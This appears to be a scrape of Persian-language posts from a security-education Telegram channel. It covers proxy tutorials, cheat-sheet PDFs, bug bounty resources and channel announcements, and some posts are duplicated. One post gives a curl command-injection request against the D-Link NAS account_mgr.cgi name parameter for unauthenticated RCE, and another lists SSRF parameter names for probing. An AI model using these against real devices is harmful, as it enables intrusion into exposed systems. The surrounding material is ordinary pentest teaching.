🎯 محل قرار گیری proxy ها در شبکه (B)
🔹 Access (Ingress) Proxy
این پراکسیها در سمت ورودی شبکه قرار میگیرند، مثل داخل شرکتهای ISP.
کاربردهاشون:
* کشکردن صفحات پرطرفدار برای افزایش سرعت دانلود 🚀
* کاهش مصرف پهنای باند اینترنت کاربران
* مناسب برای مکانهایی که اینترنت گرونه یا محدود دارن (مثلاً خوابگاه یا شرکتهای بزرگ)
🔹 Surrogate / Reverse Proxy
اینها همون Reverse Proxy هستن که معمولاً جلوی وبسرورها قرار میگیرن.
کاربردها:
* افزایش امنیت سرورهای واقعی
* کشکردن محتوا از سمت سرور برای کاهش بار
* پنهانکردن IP واقعی سرور
* معمولاً کاربر فقط آدرس همین پراکسی رو میبینه، نه آدرس واقعی سرور 🎭
🔹 Network Exchange Proxy
این نوع پراکسیها در نقاط تبادل اینترنت (Internet Exchange) استفاده میشن.
کاربرد:
* مدیریت ازدحام اینترنتی در مسیرهای پرترافیک
* صرفهجویی در پهنای باند در مناطقی مثل اروپا یا کشورهایی با هزینه بالا
🔹 Proxy Hierarchies (سلسلهمراتب پراکسی)
گاهی پراکسیها به صورت زنجیرهای و چندلایهای تنظیم میشن.
مثلاً:
Client → Proxy 1 (فرزند) → Proxy 2 (والد) → اینترنت یا وبسرور
📦 این ساختار باعث میشه درخواستها بهصورت هوشمند بین چند پراکسی جابهجا بشن، تا سریعترین یا بهینهترین پاسخ ارائه بشه.
🧭 Content Routing در ساختار سلسلهمراتبی
بر اساس نوع درخواست یا مقصد، پراکسی میتونه مسیرش رو عوض کنه. مثلاً:
* اگر محتوایی قبلاً کش شده باشه، مستقیماً تحویل داده میشه
* اگر نه، پراکسی بعدی یا سرور اصلی اون رو Fetch میکنه
* حتی ممکنه تصاویر رو فشرده کنه تا سریعتر بارگذاری بشه (ویژه موبایل یا مودمهای ضعیف) 📉📷
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Proxy #CyberSecurity
🔹 Access (Ingress) Proxy
این پراکسیها در سمت ورودی شبکه قرار میگیرند، مثل داخل شرکتهای ISP.
کاربردهاشون:
* کشکردن صفحات پرطرفدار برای افزایش سرعت دانلود 🚀
* کاهش مصرف پهنای باند اینترنت کاربران
* مناسب برای مکانهایی که اینترنت گرونه یا محدود دارن (مثلاً خوابگاه یا شرکتهای بزرگ)
🔹 Surrogate / Reverse Proxy
اینها همون Reverse Proxy هستن که معمولاً جلوی وبسرورها قرار میگیرن.
کاربردها:
* افزایش امنیت سرورهای واقعی
* کشکردن محتوا از سمت سرور برای کاهش بار
* پنهانکردن IP واقعی سرور
* معمولاً کاربر فقط آدرس همین پراکسی رو میبینه، نه آدرس واقعی سرور 🎭
🔹 Network Exchange Proxy
این نوع پراکسیها در نقاط تبادل اینترنت (Internet Exchange) استفاده میشن.
کاربرد:
* مدیریت ازدحام اینترنتی در مسیرهای پرترافیک
* صرفهجویی در پهنای باند در مناطقی مثل اروپا یا کشورهایی با هزینه بالا
🔹 Proxy Hierarchies (سلسلهمراتب پراکسی)
گاهی پراکسیها به صورت زنجیرهای و چندلایهای تنظیم میشن.
مثلاً:
Client → Proxy 1 (فرزند) → Proxy 2 (والد) → اینترنت یا وبسرور
📦 این ساختار باعث میشه درخواستها بهصورت هوشمند بین چند پراکسی جابهجا بشن، تا سریعترین یا بهینهترین پاسخ ارائه بشه.
🧭 Content Routing در ساختار سلسلهمراتبی
بر اساس نوع درخواست یا مقصد، پراکسی میتونه مسیرش رو عوض کنه. مثلاً:
* اگر محتوایی قبلاً کش شده باشه، مستقیماً تحویل داده میشه
* اگر نه، پراکسی بعدی یا سرور اصلی اون رو Fetch میکنه
* حتی ممکنه تصاویر رو فشرده کنه تا سریعتر بارگذاری بشه (ویژه موبایل یا مودمهای ضعیف) 📉📷
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Proxy #CyberSecurity
👍6❤2
HTTP Status Code Cheatsheet.pdf
807.2 KB
✏️ مقاله تالیف شده
HTTP Status Code Cheatsheet (in cybersecurity terms)
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #CheatSheet #CyberSecurity
HTTP Status Code Cheatsheet (in cybersecurity terms)
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #CheatSheet #CyberSecurity
👍7
۲۵ پارامتر رایج SSRF 📃
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
-?dest={target}
-?redirect={target}
-?uri={target}
-?path={target}
-?continue={target}
-?url={target}
-?window={target}
-?next={target}
-?data={target}
-?reference={target}
-?site={target}
-?html={target}
-?val={target}
-?validate={target}
-?domain={target}
-?callback={target}
-?return={target}
-?page={target}
-?feed={target}
-?host={target}
-?port={target}
-?to={target}
-?out={target}
-?view={target}
-?dir={target}
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
❤6
🥷 تزریق فرمان در پارامتر NAME برای D-Link NAS
اجرای کد از راه دور (RCE) بدون تخصیص در چهار دستگاه مختلف ذخیرهسازی دادههای شبکه، که بیش از ۶۰٬۰۰۰ عدد از آنها از طریق اینترنت در دسترس هستند.
یک باگ بسیار ساده که میتوان با فازبندی ساده پیدا کرد:
#pentest #bugbounty
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
اجرای کد از راه دور (RCE) بدون تخصیص در چهار دستگاه مختلف ذخیرهسازی دادههای شبکه، که بیش از ۶۰٬۰۰۰ عدد از آنها از طریق اینترنت در دسترس هستند.
یک باگ بسیار ساده که میتوان با فازبندی ساده پیدا کرد:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
#pentest #bugbounty
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
🔥5
نگاهی به آموزش های قبل :
بررسی جامع و دقیق درباره پروتکل Kerberos.
درمورد Recon-user بدانید .
بهترین ماشینهای مجازی برای متخصصان امنیت سایبری .
کتاب وایرشارک برای ردتیمرها .
در ابزار Nuclei روش جدیدی برای تشخیص حملات XSS اضافه شده است!
آیا قبلاً خواستهاید به سرعت باگهای «HTTP Request Smuggling» را تست کنید؟
کتاب میمیکتز راهنمای عملی هکرها .
درمورد ابزار Evilginx3 Phishlets بدانید .
به تحقیق در مورد امنیت وردپرس علاقه دارید؟
دور زدن احراز هویت Ruby-SAML / GitLab (CVE-2024-45409)
بازگشت سایهی استاکسنت – قسمت اول
آموزش Proxies (پارت 0)
بازگشت سایهی استاکسنت – قسمت دوم
مهندسی اجتماعی در رد تیمینگ
آموزش Proxies (پارت 1)
تفاوت Proxy و Gateway در یک نگاه
آموزش های قبل تر
@TryHackBox
بررسی جامع و دقیق درباره پروتکل Kerberos.
درمورد Recon-user بدانید .
بهترین ماشینهای مجازی برای متخصصان امنیت سایبری .
کتاب وایرشارک برای ردتیمرها .
در ابزار Nuclei روش جدیدی برای تشخیص حملات XSS اضافه شده است!
آیا قبلاً خواستهاید به سرعت باگهای «HTTP Request Smuggling» را تست کنید؟
کتاب میمیکتز راهنمای عملی هکرها .
درمورد ابزار Evilginx3 Phishlets بدانید .
به تحقیق در مورد امنیت وردپرس علاقه دارید؟
دور زدن احراز هویت Ruby-SAML / GitLab (CVE-2024-45409)
بازگشت سایهی استاکسنت – قسمت اول
آموزش Proxies (پارت 0)
بازگشت سایهی استاکسنت – قسمت دوم
مهندسی اجتماعی در رد تیمینگ
آموزش Proxies (پارت 1)
تفاوت Proxy و Gateway در یک نگاه
آموزش های قبل تر
@TryHackBox
🔥6
🔐 آموزش تخصصی هک و امنیت سایبری
🎓 دورههای عملی، تحلیل عمیق و محتوای حرفهای در حوزه IT و امنیت اطلاعات
🚀 مناسب علاقهمندان، متخصصان و آیندهسازان حوزه سایبری
📍 همراه ما باشید در:
🔗 @sajjadteymouri
🎓 دورههای عملی، تحلیل عمیق و محتوای حرفهای در حوزه IT و امنیت اطلاعات
🚀 مناسب علاقهمندان، متخصصان و آیندهسازان حوزه سایبری
📍 همراه ما باشید در:
🔗 @sajjadteymouri
🔥2
What is Attribute-Based Access Control (ABAC).pdf
603 KB
💢 کنترل دسترسی مبتنی بر ویژگی (ABAC) چیست؟
هر سازمانی به کنترلهای دسترسی وابسته است تا دادههای حساس را محافظت کند، سیاستهای امنیتی را اجرا نماید و اطمینان حاصل کند که کارمندان سطح مناسبی از دسترسی به سیستمها و برنامهها دارند. بهطور ساختار یافته، کنترل دسترسی مبتنی بر نقش (RBAC) مدل اصلی بوده است که مجوزها را بر اساس نقشهای از پیش تعریفشده تخصیص میدهد. اگرچه این مدل در بسیاری از سناریوها مؤثر است، اما RBAC در محیطهای پویا که کاربران، دستگاهها و زمینههای داده بهطور مداوم در حال تغییر هستند، محدودیتهایی دارد.
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
هر سازمانی به کنترلهای دسترسی وابسته است تا دادههای حساس را محافظت کند، سیاستهای امنیتی را اجرا نماید و اطمینان حاصل کند که کارمندان سطح مناسبی از دسترسی به سیستمها و برنامهها دارند. بهطور ساختار یافته، کنترل دسترسی مبتنی بر نقش (RBAC) مدل اصلی بوده است که مجوزها را بر اساس نقشهای از پیش تعریفشده تخصیص میدهد. اگرچه این مدل در بسیاری از سناریوها مؤثر است، اما RBAC در محیطهای پویا که کاربران، دستگاهها و زمینههای داده بهطور مداوم در حال تغییر هستند، محدودیتهایی دارد.
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
❤13👌3👍1
All Bug Bounty Platforms List TryHackBox .pdf
847 KB
🗞 لیست جامع از همه پلتفرمهای باگبانتی
#باگ_بانتی #BugBounty
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
#باگ_بانتی #BugBounty
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
👍10⚡1
🚀 آموزش Proxies (پارت 5)
🌐 مبانی مسیریابی پروکسی در HTTP (بخش A)
در دنیای پراکسیها (Proxies)، مسیریابی درخواستها یکی از مهمترین عملکردها برای بهبود عملکرد، مقیاسپذیری و امنیت است. بیایید با ۳ نوع متداول مسیریابی توسط (Child Proxies) آشنا شویم:
🌀 1. توزیع بار (Load Balancing)
پراکسی فرزند میتواند پراکسی والد (Parent Proxy) را بر اساس وضعیت بار فعلی انتخاب کند.
✅ هدف: جلوگیری از فشار زیاد روی یک مسیر
🔁 با پخش ترافیک، عملکرد شبکه بهینه میشود.
📍 2. مسیریابی بر اساس موقعیت جغرافیایی
در این روش، پراکسی فرزند والدینی را انتخاب میکند که به سرور مبدأ نزدیکتر هستند.
✅ هدف: کاهش تأخیر (Latency) و بهبود تجربه کاربر
🌍 مثال: درخواست کاربر ایرانی به والد نزدیک به خاورمیانه ارسال میشود.
📦 3. مسیریابی بر اساس نوع درخواست یا پروتکل
پراکسی ممکن است بسته به نوع پروتکل یا مسیر URI، درخواست را به والد خاصی ارسال کند.
🔗 مثلا درخواستهای REST به یک والد، و SOAP به والد دیگر ارسال شود.
✅ هدف: تخصصیسازی مسیر و افزایش بهرهوری
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Proxy #CyberSecurity
🌐 مبانی مسیریابی پروکسی در HTTP (بخش A)
در دنیای پراکسیها (Proxies)، مسیریابی درخواستها یکی از مهمترین عملکردها برای بهبود عملکرد، مقیاسپذیری و امنیت است. بیایید با ۳ نوع متداول مسیریابی توسط (Child Proxies) آشنا شویم:
🌀 1. توزیع بار (Load Balancing)
پراکسی فرزند میتواند پراکسی والد (Parent Proxy) را بر اساس وضعیت بار فعلی انتخاب کند.
✅ هدف: جلوگیری از فشار زیاد روی یک مسیر
🔁 با پخش ترافیک، عملکرد شبکه بهینه میشود.
📍 2. مسیریابی بر اساس موقعیت جغرافیایی
در این روش، پراکسی فرزند والدینی را انتخاب میکند که به سرور مبدأ نزدیکتر هستند.
✅ هدف: کاهش تأخیر (Latency) و بهبود تجربه کاربر
🌍 مثال: درخواست کاربر ایرانی به والد نزدیک به خاورمیانه ارسال میشود.
📦 3. مسیریابی بر اساس نوع درخواست یا پروتکل
پراکسی ممکن است بسته به نوع پروتکل یا مسیر URI، درخواست را به والد خاصی ارسال کند.
🔗 مثلا درخواستهای REST به یک والد، و SOAP به والد دیگر ارسال شود.
✅ هدف: تخصصیسازی مسیر و افزایش بهرهوری
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Proxy #CyberSecurity
👍4🤔1
🌐 مبانی مسیریابی پروکسی در HTTP (بخش B)
در این قسمت دو محور را بررسی میکنیم:
1️⃣ روش Subscription-Based Routing
2️⃣ روشهای چهارگانه انتقال ترافیک کلاینت به پراکسیها (How Proxies Get Traffic)
روش Subscription-Based Routing چیست؟
در برخی زیرساختها، ارائهدهندگان محتوا (مثل CDNها یا شرکتهای تبلیغاتی) برای داشتن کیفیت بهتر سرویس و سرعت بالاتر دسترسی، به ارائهدهنده پراکسی مبلغ بیشتری پرداخت میکنند.
✅ ویژگیهای این نوع مسیردهی:
* محتوا زودتر به کش منتقل میشود.
* دادهها فشردهتر و سریعتر ارائه میشوند.
* درخواستها بر اساس زبان برنامهنویسی، افزونه یا منطق خاص به سرور یا پراکسی مناسب فرستاده میشوند.
* در محصولات مرورگر، افزونه، یا سیستمعامل، به شکل متفاوتی پیادهسازی میشود.
📌 هدف اصلی: افزایش سرعت بارگذاری و کاهش تاخیر در پاسخدهی به کاربر نهایی
🛰 چگونه ترافیک کلاینتها به پراکسی میرسد؟ (4 راه اصلی)
در مدل کلاسیک، مرورگرها مستقیم به سرور وب متصل میشوند. اما پراکسیها این مسیر را تغییر میدهند. روشهای زیر برای هدایت ترافیک کلاینت به پراکسی استفاده میشوند:
🔹 1. تغییر در کلاینت (Modify the Client)
🔧 با تنظیم دستی یا خودکار پراکسی در مرورگر (مثل Chrome یا Firefox):
• اگر کلاینت بهدرستی تنظیم شده باشد، همهی درخواستهای HTTP را مستقیماً به پراکسی ارسال میکند.
• این روش واضح، مستقیم و کنترلشده است.
📥 مثال: کاربر در تنظیمات مرورگر آدرس
🔹 2. تغییر در شبکه (Modify the Network)
🎯 به کمک تجهیزات شبکه مثل فایروال، سوییچ یا روتر:
• پراکسی بهصورت Interception یا Transparent اجرا میشود.
• کاربر حتی متوجه نمیشود که ترافیکش به پراکسی میرود.
📌 مثال: فایروال سازمان، تمام ترافیک پورت 80 را به پراکسی هدایت میکند.
📛 توجه: استفاده نادرست از این روش میتواند باعث نقض حریم خصوصی یا مشکلات امنیتی شود.
🔹 3. تغییر در نامگذاری دی ان اس (Modify the DNS Namespace)
🌍 با فریب DNS یا استفاده از رکوردهای DNS خاص (Surrogates):
• آدرسهایی که کاربران وارد میکنند، به جای سرور واقعی، به آدرس پراکسی اشاره میکنند.
• با DNS میشود IP مقصد را هنگام درخواست، دینامیک و طبق سیاست خاص محاسبه کند.
📥 مثال: کاربر
🔹 4. تغییر در وبسرور (Modify the Web Server)
🖥 وبسرور به کلاینت دستور استفاده از پراکسی را میدهد:
• با ارسال پاسخ HTTP
• کلاینت در پاسخ به این دستور، از پراکسی تعیینشده استفاده میکند.
⚠️ این روش به دلایل امنیتی در اکثر مرورگرها دیگر پشتیبانی نمیشود.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Proxy #CyberSecurity
در این قسمت دو محور را بررسی میکنیم:
1️⃣ روش Subscription-Based Routing
2️⃣ روشهای چهارگانه انتقال ترافیک کلاینت به پراکسیها (How Proxies Get Traffic)
روش Subscription-Based Routing چیست؟
در برخی زیرساختها، ارائهدهندگان محتوا (مثل CDNها یا شرکتهای تبلیغاتی) برای داشتن کیفیت بهتر سرویس و سرعت بالاتر دسترسی، به ارائهدهنده پراکسی مبلغ بیشتری پرداخت میکنند.
✅ ویژگیهای این نوع مسیردهی:
* محتوا زودتر به کش منتقل میشود.
* دادهها فشردهتر و سریعتر ارائه میشوند.
* درخواستها بر اساس زبان برنامهنویسی، افزونه یا منطق خاص به سرور یا پراکسی مناسب فرستاده میشوند.
* در محصولات مرورگر، افزونه، یا سیستمعامل، به شکل متفاوتی پیادهسازی میشود.
📌 هدف اصلی: افزایش سرعت بارگذاری و کاهش تاخیر در پاسخدهی به کاربر نهایی
🛰 چگونه ترافیک کلاینتها به پراکسی میرسد؟ (4 راه اصلی)
در مدل کلاسیک، مرورگرها مستقیم به سرور وب متصل میشوند. اما پراکسیها این مسیر را تغییر میدهند. روشهای زیر برای هدایت ترافیک کلاینت به پراکسی استفاده میشوند:
🔹 1. تغییر در کلاینت (Modify the Client)
🔧 با تنظیم دستی یا خودکار پراکسی در مرورگر (مثل Chrome یا Firefox):
• اگر کلاینت بهدرستی تنظیم شده باشد، همهی درخواستهای HTTP را مستقیماً به پراکسی ارسال میکند.
• این روش واضح، مستقیم و کنترلشده است.
📥 مثال: کاربر در تنظیمات مرورگر آدرس
proxy.mycompany.local:3128
را وارد میکند.🔹 2. تغییر در شبکه (Modify the Network)
🎯 به کمک تجهیزات شبکه مثل فایروال، سوییچ یا روتر:
• پراکسی بهصورت Interception یا Transparent اجرا میشود.
• کاربر حتی متوجه نمیشود که ترافیکش به پراکسی میرود.
📌 مثال: فایروال سازمان، تمام ترافیک پورت 80 را به پراکسی هدایت میکند.
📛 توجه: استفاده نادرست از این روش میتواند باعث نقض حریم خصوصی یا مشکلات امنیتی شود.
🔹 3. تغییر در نامگذاری دی ان اس (Modify the DNS Namespace)
🌍 با فریب DNS یا استفاده از رکوردهای DNS خاص (Surrogates):
• آدرسهایی که کاربران وارد میکنند، به جای سرور واقعی، به آدرس پراکسی اشاره میکنند.
• با DNS میشود IP مقصد را هنگام درخواست، دینامیک و طبق سیاست خاص محاسبه کند.
📥 مثال: کاربر
example.com
را باز میکند، ولی DNS، IP پراکسی را به او میدهد.🔹 4. تغییر در وبسرور (Modify the Web Server)
🖥 وبسرور به کلاینت دستور استفاده از پراکسی را میدهد:
• با ارسال پاسخ HTTP
305 Use Proxy
• کلاینت در پاسخ به این دستور، از پراکسی تعیینشده استفاده میکند.
⚠️ این روش به دلایل امنیتی در اکثر مرورگرها دیگر پشتیبانی نمیشود.
✍️نویسنده
@TryHackBox | The Chaos
#HTTP #Proxy #CyberSecurity
❤3
⭕️ دیگر کانال ها و شبکه های اجتماعی ما را دنبال کنید :
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
🔶 کانال PFKSecurity از جمله پوشش APT , CVE , Exploit و موارد دیگر :
🆔 @PfkSecurity
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
💠 کانال های تلگرام ما
🔶 آموزش تست نفوذ و Red Team
🆔 @TryHackBox
🔶 رودمپ های مختلف
🆔 @TryHackBoxOfficial
🔶 داستان های هک
🆔 @TryHackBoxStory
🔶 آموزش برنامه نویسی
🆔 @TryCodeBox
🔶 رادیو زیروپاد ( پادکست ها )
🆔 @RadioZeroPod
🔶 کانال PFKSecurity از جمله پوشش APT , CVE , Exploit و موارد دیگر :
🆔 @PfkSecurity
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
👥 گروه های پرسش و پاسخ
🔷 هک و امنیت
🆔 @TryHackBoxGroup
🔷 برنامه نویسی
🆔 @TryCodeBoxGroup
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🔴 اینستاگرام :
🔗 http://www.instagram.com/TryHackBox
🔵 یوتیوب :
🔗 https://youtube.com/@tryhackbox
🟠 گیت هاب ما :
🔗 https://github.com/TryHackBox/
YouTube
TryHackBox
یادگیری مقدمات پیش نیازهای حوزه تست نفوذ به صورت رایگان | یادگیری حوزه تست نفوذ شبکه و وب
JSON Cheatsheet.pdf
4.9 MB
✏️ مقاله تالیف شده
JSON Code Cheatsheet (in cybersecurity terms)
✍️نویسنده
@TryHackBox | The Chaos
#JSON #CheatSheet #CyberSecurity
JSON Code Cheatsheet (in cybersecurity terms)
✍️نویسنده
@TryHackBox | The Chaos
#JSON #CheatSheet #CyberSecurity
❤🔥4
Social Engineering and AI.pdf
1.3 MB
هوش مصنوعی و مهندسی اجتماعی
هوش مصنوعی در حال پیشبرد نوآوری و دگرگونی تمام صنایع است از بهداشت و درمان تا خردهفروشی و تولید.هوش مصنوعی به کسبوکارها در سراسر جهان توانایی عملکرد با کارایی و پیچیدگی بیشتر را میدهد. به همین ترتیب،هوش مصنوعی به مجرمان سایبری نیز قدرت میبخشد.
تکنیک کلاسیک مهندسی اجتماعی شامل روشهای فریبنده مانند جعل هویت یا دستکاری اعتماد برای استخراج اطلاعات شخصی و محرمانه از افراد تارگت است.با افزایش قدرت و دسترسی ابزارهای هوش مصنوعی، حملات مهندسی اجتماعی اکنون به طور قابل توجهی شخصیسازی شدهتر، مؤثرتر و مقیاسپذیرتر شدهاند. دفاع در برابر چنین حملاتی به ابزارهای پیچیدهتری نسبت به گذشته نیاز دارد.
در این مقاله،بررسی خواهیم کرد که چگونه هوش مصنوعی مهندسی اجتماعی را به سطح جدیدی ارتقا داده است.به طور خاص، به این خواهیم پرداخت که چگونه فناوریهای نوظهور مانند دیپفیکها، تکنیکهای مهندسی اجتماعی را تقویت کرده و پتانسیل تقلب را افزایش دادهاند. همچنین راهبردهای کاهش تهدید و ابزارهای موجود برای سازمانها را برای مقابله مؤثر با این چالش بررسی خواهیم کرد.
#مهندسی_اجتماعی
#AI #SE
@TryHackBox
هوش مصنوعی در حال پیشبرد نوآوری و دگرگونی تمام صنایع است از بهداشت و درمان تا خردهفروشی و تولید.هوش مصنوعی به کسبوکارها در سراسر جهان توانایی عملکرد با کارایی و پیچیدگی بیشتر را میدهد. به همین ترتیب،هوش مصنوعی به مجرمان سایبری نیز قدرت میبخشد.
تکنیک کلاسیک مهندسی اجتماعی شامل روشهای فریبنده مانند جعل هویت یا دستکاری اعتماد برای استخراج اطلاعات شخصی و محرمانه از افراد تارگت است.با افزایش قدرت و دسترسی ابزارهای هوش مصنوعی، حملات مهندسی اجتماعی اکنون به طور قابل توجهی شخصیسازی شدهتر، مؤثرتر و مقیاسپذیرتر شدهاند. دفاع در برابر چنین حملاتی به ابزارهای پیچیدهتری نسبت به گذشته نیاز دارد.
در این مقاله،بررسی خواهیم کرد که چگونه هوش مصنوعی مهندسی اجتماعی را به سطح جدیدی ارتقا داده است.به طور خاص، به این خواهیم پرداخت که چگونه فناوریهای نوظهور مانند دیپفیکها، تکنیکهای مهندسی اجتماعی را تقویت کرده و پتانسیل تقلب را افزایش دادهاند. همچنین راهبردهای کاهش تهدید و ابزارهای موجود برای سازمانها را برای مقابله مؤثر با این چالش بررسی خواهیم کرد.
#مهندسی_اجتماعی
#AI #SE
@TryHackBox
❤21
دوستان #سوال بهترین و بدترین تجربهتان با آکادمیها که آموزش دیدید چه بوده؟
اگر مایل نبودید توی کامنت ها بنویسید میتوانید در اکانت پشیبانی جواب بدید
@THBxSupport
برگزاری جلسه ویس چت : مهندس سهیل هاشمی
با سلام خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص اهمیت ردتیم ( Red Team ) در سازمان ها به صورت ویس چت برگزار کنیم.
🎙️ مهمان ویژه:
مهندس سهیل هاشمی – کارشناس Red Team
📅 زمان برگزاری: امشب
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 20:30
💬 سوالات خود را درباره Red Team در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
@TryHackBox
با سلام خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص اهمیت ردتیم ( Red Team ) در سازمان ها به صورت ویس چت برگزار کنیم.
🎙️ مهمان ویژه:
مهندس سهیل هاشمی – کارشناس Red Team
📅 زمان برگزاری: امشب
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 20:30
💬 سوالات خود را درباره Red Team در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
@TryHackBox
👍6🔥4